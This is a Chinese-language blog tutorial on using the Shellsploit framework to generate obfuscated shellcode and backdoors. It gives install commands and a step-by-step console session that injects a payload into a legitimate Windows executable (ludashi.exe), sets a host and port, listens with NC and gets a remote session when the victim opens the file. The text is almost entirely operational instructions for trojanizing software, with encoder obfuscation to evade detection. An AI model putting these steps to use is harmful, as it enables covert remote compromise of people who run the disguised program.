Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。
github: ?https://github.com/vasco2016/shellsploit-framework
依赖安装 root$ sudo pip install capstone root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit) root$ sudo pip install pefile root$ sudo pip install colorama root$ sudo pip install pylzma 安装 Pip在windows/nix机器上都没有问题安装命令如下: root$ python setup.py –s/ –setup install root$ chmod +x shellsploit (if you are using windows just pass this step) root$ ./shellsploit
1.使用shellsploit可以看到运行界面,其实使用方法和msf类似,差不多!
2.比如我在这里查看injectors注入模块
ssf> show injectors
3.使用injectors模块其中一个
ssf>use injectors/Windows/BFD/Patching
4.查看下他里面有什么选项(其实和msf设置方法差不多)
ssf:injectors/Windows/BFD/Patching > show options
5.剩下的设置file 、host、port 这些选择,进行一些设置,其中的file选择我已经将模板放到了目录当中。
6.进行Payload注入,注入后的模板放入到了—File /root/shellsploit-framework/704125575/ludashi.exe
ssf:injectors/Windows/BFD/Patching > inject
7.使用NC进行监听
8.打开payload得到会话
这里可能有些小小的BUG,但影响并不大我们依然可以得到会话。
视频:
转载请注明:即刻安全 » Shellsploit注入器简单利用